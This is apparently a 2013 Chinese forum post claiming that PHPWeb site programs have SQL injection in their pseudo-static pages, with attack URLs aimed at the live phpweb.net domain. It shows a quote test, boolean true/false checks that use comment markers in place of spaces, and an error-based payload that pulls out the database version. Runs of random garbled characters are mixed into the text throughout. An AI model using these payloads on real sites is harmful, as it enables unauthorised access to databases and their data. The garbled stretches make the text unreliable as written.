phpweb所有的整站程序伪静态页面都存在sql注入. S' g8 o& B6 o" @9 U
" v+ } i1 F* U主站:http://phpweb.net/5 X |5 c0 y1 v1 c7 S/ ~. F
加’检测:
+ m- t& l c. K: f
/ `$ S: F5 z( g9 {( m+ v/ Lhttp://www.phpweb.net/down/html/?772′.html) P+ }! }: o4 h8 V5 x
* b& `7 }( d/ T! v9 q) y7 n- u- N出错# a3 a p/ ~ n5 L
存在注入。
* M* B3 o: `" y& D" Q; l# Q不能用空格,只能用/*罗
2 n! M @$ b' w) Xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
2 G2 {0 O( E* T / g: i# G& t5 W$ @6 R
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
/ V6 R3 z# G8 R# }, y! L2 ^爆数据库版本:# L! L) ]* F3 D7 e2 R \, y
5 Q F7 @3 ^+ f, [?
4 k: X- n: r: C1" o! @7 c# h& W; s, r* }- J
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html8 R% N' g1 `4 t1 h7 O
更新日期: 2013-01-03 13:39:50 ' Q- C, g* J0 Z# t9 ]
|